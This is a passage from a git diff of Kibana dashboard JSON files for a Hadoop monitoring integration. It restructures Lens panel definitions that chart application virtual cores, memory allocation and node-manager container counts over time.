"enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 8, + "i": "9fed89bd-d709-4c4a-a84a-93b4d805940a", + "w": 8, + "x": 18, + "y": 0 + }, + "panelIndex": "9fed89bd-d709-4c4a-a84a-93b4d805940a", + "title": "Average elapsed time [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c0d13a02-cbb4-496c-88bd-6187253ec8d8", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c0d13a02-cbb4-496c-88bd-6187253ec8d8": { + "columnOrder": [ + "71dbc991-2911-4abe-b977-4dda3d9d5bb0", + "b1201382-d991-47f1-9466-b0a4231edf29" + ], + "columns": { + "71dbc991-2911-4abe-b977-4dda3d9d5bb0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Application Id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "b1201382-d991-47f1-9466-b0a4231edf29", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "accessor": "a72c3684-ca50-4a1e-bae7-328ae098c42d", - "layerId": "3003026c-64e9-4a34-9256-5500fb1a618a", - "layerType": "data", - "size": "m", - "textAlign": "center", - "titlePosition": "bottom" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "hadoop.application.id" }, - "title": "", - "type": "lens", - "visualizationType": "lnsLegacyMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "b1201382-d991-47f1-9466-b0a4231edf29": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Virtual Cores", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.vcore_seconds" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 8, - "i": "3a5fad55-3e58-4326-8dbb-a71291fad652", - "w": 8, - "x": 18, - "y": 8 + "layers": [ + { + "accessors": [ + "b1201382-d991-47f1-9466-b0a4231edf29" + ], + "layerId": "c0d13a02-cbb4-496c-88bd-6187253ec8d8", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "xAccessor": "71dbc991-2911-4abe-b977-4dda3d9d5bb0", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "b1201382-d991-47f1-9466-b0a4231edf29" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "panelIndex": "3a5fad55-3e58-4326-8dbb-a71291fad652", - "title": "Maximum virtual cores allocated to the application's running containers [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" + "preferredSeriesType": "bar_horizontal", + "title": "Empty XY chart", + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-f39f3706-d2c4-42a9-80dc-d5db38283fd0", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "f39f3706-d2c4-42a9-80dc-d5db38283fd0": { - "columnOrder": [ - "d46b83b5-6fd9-4b12-82bc-ab59592531e8", - "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" - ], - "columns": { - "d46b83b5-6fd9-4b12-82bc-ab59592531e8": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Application Id", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "hadoop.application.id" - }, - "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Amount of Memory (MB)", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.memory_seconds" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" - ], - "layerId": "f39f3706-d2c4-42a9-80dc-d5db38283fd0", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "xAccessor": "d46b83b5-6fd9-4b12-82bc-ab59592531e8", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_horizontal", - "title": "Empty XY chart", - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f", - "w": 22, - "x": 26, - "y": 12 - }, - "panelIndex": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f", - "title": "Amount of Memory Allocated [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0", + "w": 22, + "x": 26, + "y": 0 + }, + "panelIndex": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0", + "title": "Number of Virtual Cores Allocated [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-3003026c-64e9-4a34-9256-5500fb1a618a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3003026c-64e9-4a34-9256-5500fb1a618a": { + "columnOrder": [ + "a72c3684-ca50-4a1e-bae7-328ae098c42d" + ], + "columns": { + "a72c3684-ca50-4a1e-bae7-328ae098c42d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Max Virtual Cores Allocated", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.allocated.v_cores" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "a72c3684-ca50-4a1e-bae7-328ae098c42d", + "layerId": "3003026c-64e9-4a34-9256-5500fb1a618a", + "layerType": "data", + "size": "m", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5": { - "columnOrder": [ - "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6" - ], - "columns": { - "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Max Allocated Memory (MB)", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.allocated.mb" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 8, + "i": "3a5fad55-3e58-4326-8dbb-a71291fad652", + "w": 8, + "x": 18, + "y": 8 + }, + "panelIndex": "3a5fad55-3e58-4326-8dbb-a71291fad652", + "title": "Maximum virtual cores allocated to the application's running containers [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f39f3706-d2c4-42a9-80dc-d5db38283fd0", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "f39f3706-d2c4-42a9-80dc-d5db38283fd0": { + "columnOrder": [ + "d46b83b5-6fd9-4b12-82bc-ab59592531e8", + "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" + ], + "columns": { + "d46b83b5-6fd9-4b12-82bc-ab59592531e8": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Application Id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "accessor": "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6", - "layerId": "f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", - "layerType": "data", - "size": "m", - "textAlign": "center", - "titlePosition": "bottom" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "hadoop.application.id" }, - "title": "", - "type": "lens", - "visualizationType": "lnsLegacyMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Amount of Memory (MB)", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.memory_seconds" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 8, - "i": "c9df8dfd-25c1-4cea-9b59-71bb227c1826", - "w": 8, - "x": 18, - "y": 16 + "layers": [ + { + "accessors": [ + "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" + ], + "layerId": "f39f3706-d2c4-42a9-80dc-d5db38283fd0", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "xAccessor": "d46b83b5-6fd9-4b12-82bc-ab59592531e8", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "panelIndex": "c9df8dfd-25c1-4cea-9b59-71bb227c1826", - "title": "Maximum memory allocated to the application's running containers [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Hadoop] Applications", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-10T08:25:28.388Z", - "id": "hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107", - "managed": false, - "references": [ - { - "id": "logs-*", - "name": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1:indexpattern-datasource-layer-dcf6a578-de72-4570-9fd8-f157f6494eb8", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "9fed89bd-d709-4c4a-a84a-93b4d805940a:indexpattern-datasource-layer-358c9e71-f4a3-4980-adec-21e72950e734", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0:indexpattern-datasource-layer-c0d13a02-cbb4-496c-88bd-6187253ec8d8", - "type": "index-pattern" + "preferredSeriesType": "bar_horizontal", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "logs-*", - "name": "3a5fad55-3e58-4326-8dbb-a71291fad652:indexpattern-datasource-layer-3003026c-64e9-4a34-9256-5500fb1a618a", - "type": "index-pattern" + "gridData": { + "h": 12, + "i": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f", + "w": 22, + "x": 26, + "y": 12 }, - { - "id": "logs-*", - "name": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f:indexpattern-datasource-layer-f39f3706-d2c4-42a9-80dc-d5db38283fd0", - "type": "index-pattern" + "panelIndex": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f", + "title": "Amount of Memory Allocated [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5": { + "columnOrder": [ + "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6" + ], + "columns": { + "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Max Allocated Memory (MB)", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.allocated.mb" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6", + "layerId": "f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", + "layerType": "data", + "size": "m", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true }, - { - "id": "logs-*", - "name": "c9df8dfd-25c1-4cea-9b59-71bb227c1826:indexpattern-datasource-layer-f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", - "type": "index-pattern" + "gridData": { + "h": 8, + "i": "c9df8dfd-25c1-4cea-9b59-71bb227c1826", + "w": 8, + "x": 18, + "y": 16 }, - { - "id": "logs-*", - "name": "controlGroup_6df7972b-25f0-453b-829b-c183cddbc2f8:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "c9df8dfd-25c1-4cea-9b59-71bb227c1826", + "title": "Maximum memory allocated to the application's running containers [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Hadoop] Applications", + "version": 1 + }, + "references": [ + { + "id": "logs-*", + "name": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1:indexpattern-datasource-layer-dcf6a578-de72-4570-9fd8-f157f6494eb8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9fed89bd-d709-4c4a-a84a-93b4d805940a:indexpattern-datasource-layer-358c9e71-f4a3-4980-adec-21e72950e734", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0:indexpattern-datasource-layer-c0d13a02-cbb4-496c-88bd-6187253ec8d8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3a5fad55-3e58-4326-8dbb-a71291fad652:indexpattern-datasource-layer-3003026c-64e9-4a34-9256-5500fb1a618a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f:indexpattern-datasource-layer-f39f3706-d2c4-42a9-80dc-d5db38283fd0", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c9df8dfd-25c1-4cea-9b59-71bb227c1826:indexpattern-datasource-layer-f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6df7972b-25f0-453b-829b-c183cddbc2f8:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/hadoop/kibana/dashboard/hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/dashboard/hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2.json index 536969ae50f..df069f04758 100644 --- a/packages/hadoop/kibana/dashboard/hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2.json +++ b/packages/hadoop/kibana/dashboard/hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2.json @@ -1,562 +1,573 @@ { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "id": "hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:16:59.199Z", + "created_at": "2023-11-07T17:16:59.199Z", + "version": "WzEwMCwxXQ==", + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 20, + "i": "de277d30-051b-4343-b67b-b6b243c140f2", + "w": 27, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-b8ee20df-453e-488f-806e-6f4079a76be6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "50203b57-c1ac-4ab0-82eb-c7ca168bb650", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9b40dc83-210d-44d7-bbe3-549fbcdb09cb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6c5f4d9b-3a70-4c21-a292-32654686b081", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "b8ee20df-453e-488f-806e-6f4079a76be6": { - "columnOrder": [ - "36dd81fa-f21e-4abd-b930-ad133b3feb10", - "927733e5-8d32-42b5-8b05-e27fb1e2adfc", - "4b6e5372-3e5e-4650-9b95-d6b81250436a", - "331edd36-c03b-4cc5-ba1b-8844d0381903" - ], - "columns": { - "331edd36-c03b-4cc5-ba1b-8844d0381903": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.containers.failed: *" - }, - "isBucketed": false, - "label": "Failed", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.containers.failed" - }, - "36dd81fa-f21e-4abd-b930-ad133b3feb10": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "4b6e5372-3e5e-4650-9b95-d6b81250436a": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.containers.completed: *" - }, - "isBucketed": false, - "label": "Completed", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.containers.completed" - }, - "927733e5-8d32-42b5-8b05-e27fb1e2adfc": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.containers.running: *" - }, - "isBucketed": false, - "label": "Running", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.containers.running" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "50203b57-c1ac-4ab0-82eb-c7ca168bb650", - "key": "hadoop.node_manager.containers.running", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.containers.running" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9b40dc83-210d-44d7-bbe3-549fbcdb09cb", - "key": "hadoop.node_manager.containers.completed", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.containers.completed" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6c5f4d9b-3a70-4c21-a292-32654686b081", - "key": "hadoop.node_manager.containers.failed", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.containers.failed" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "927733e5-8d32-42b5-8b05-e27fb1e2adfc", - "4b6e5372-3e5e-4650-9b95-d6b81250436a", - "331edd36-c03b-4cc5-ba1b-8844d0381903" - ], - "layerId": "b8ee20df-453e-488f-806e-6f4079a76be6", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "36dd81fa-f21e-4abd-b930-ad133b3feb10", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "927733e5-8d32-42b5-8b05-e27fb1e2adfc" - }, - { - "axisMode": "left", - "forAccessor": "4b6e5372-3e5e-4650-9b95-d6b81250436a" - }, - { - "axisMode": "left", - "forAccessor": "331edd36-c03b-4cc5-ba1b-8844d0381903" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yTitle": "Containers" - } + "panelIndex": "de277d30-051b-4343-b67b-b6b243c140f2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-b8ee20df-453e-488f-806e-6f4079a76be6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "50203b57-c1ac-4ab0-82eb-c7ca168bb650", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9b40dc83-210d-44d7-bbe3-549fbcdb09cb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6c5f4d9b-3a70-4c21-a292-32654686b081", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "b8ee20df-453e-488f-806e-6f4079a76be6": { + "columnOrder": [ + "36dd81fa-f21e-4abd-b930-ad133b3feb10", + "927733e5-8d32-42b5-8b05-e27fb1e2adfc", + "4b6e5372-3e5e-4650-9b95-d6b81250436a", + "331edd36-c03b-4cc5-ba1b-8844d0381903" + ], + "columns": { + "331edd36-c03b-4cc5-ba1b-8844d0381903": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.containers.failed: *" + }, + "isBucketed": false, + "label": "Failed", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.node_manager.containers.failed" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "36dd81fa-f21e-4abd-b930-ad133b3feb10": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "4b6e5372-3e5e-4650-9b95-d6b81250436a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.containers.completed: *" + }, + "isBucketed": false, + "label": "Completed", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.node_manager.containers.completed" + }, + "927733e5-8d32-42b5-8b05-e27fb1e2adfc": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.containers.running: *" + }, + "isBucketed": false, + "label": "Running", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.node_manager.containers.running" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "50203b57-c1ac-4ab0-82eb-c7ca168bb650", + "key": "hadoop.node_manager.containers.running", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.containers.running" + } + } }, - "gridData": { - "h": 20, - "i": "de277d30-051b-4343-b67b-b6b243c140f2", - "w": 27, - "x": 0, - "y": 0 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9b40dc83-210d-44d7-bbe3-549fbcdb09cb", + "key": "hadoop.node_manager.containers.completed", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.containers.completed" + } + } }, - "panelIndex": "de277d30-051b-4343-b67b-b6b243c140f2", - "title": "Number of containers over time [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ee8bbb4c-7f64-46b1-965b-daec27ad4251", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d73deed1-d0bd-4f83-8759-602565e70486", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ee8bbb4c-7f64-46b1-965b-daec27ad4251": { - "columnOrder": [ - "49bd7898-d477-456f-bebd-db0024ea1510", - "96afed27-0108-42ad-a3c6-26f51cd509a2" - ], - "columns": { - "49bd7898-d477-456f-bebd-db0024ea1510": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "96afed27-0108-42ad-a3c6-26f51cd509a2": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.container_launch_duration_avg_time: *" - }, - "isBucketed": false, - "label": "Container Launch Duration Avg Time (s)", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.container_launch_duration_avg_time" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d73deed1-d0bd-4f83-8759-602565e70486", - "key": "hadoop.node_manager.container_launch_duration_avg_time", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.container_launch_duration_avg_time" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "96afed27-0108-42ad-a3c6-26f51cd509a2" - ], - "layerId": "ee8bbb4c-7f64-46b1-965b-daec27ad4251", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "49bd7898-d477-456f-bebd-db0024ea1510", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "96afed27-0108-42ad-a3c6-26f51cd509a2" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yTitle": "Seconds" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6c5f4d9b-3a70-4c21-a292-32654686b081", + "key": "hadoop.node_manager.containers.failed", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.containers.failed" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "7f0d3056-6f50-4be9-8a4b-cd51685676ec", - "w": 21, - "x": 27, - "y": 0 + "layers": [ + { + "accessors": [ + "927733e5-8d32-42b5-8b05-e27fb1e2adfc", + "4b6e5372-3e5e-4650-9b95-d6b81250436a", + "331edd36-c03b-4cc5-ba1b-8844d0381903" + ], + "layerId": "b8ee20df-453e-488f-806e-6f4079a76be6", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "36dd81fa-f21e-4abd-b930-ad133b3feb10", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "927733e5-8d32-42b5-8b05-e27fb1e2adfc" + }, + { + "axisMode": "left", + "forAccessor": "4b6e5372-3e5e-4650-9b95-d6b81250436a" + }, + { + "axisMode": "left", + "forAccessor": "331edd36-c03b-4cc5-ba1b-8844d0381903" + } + 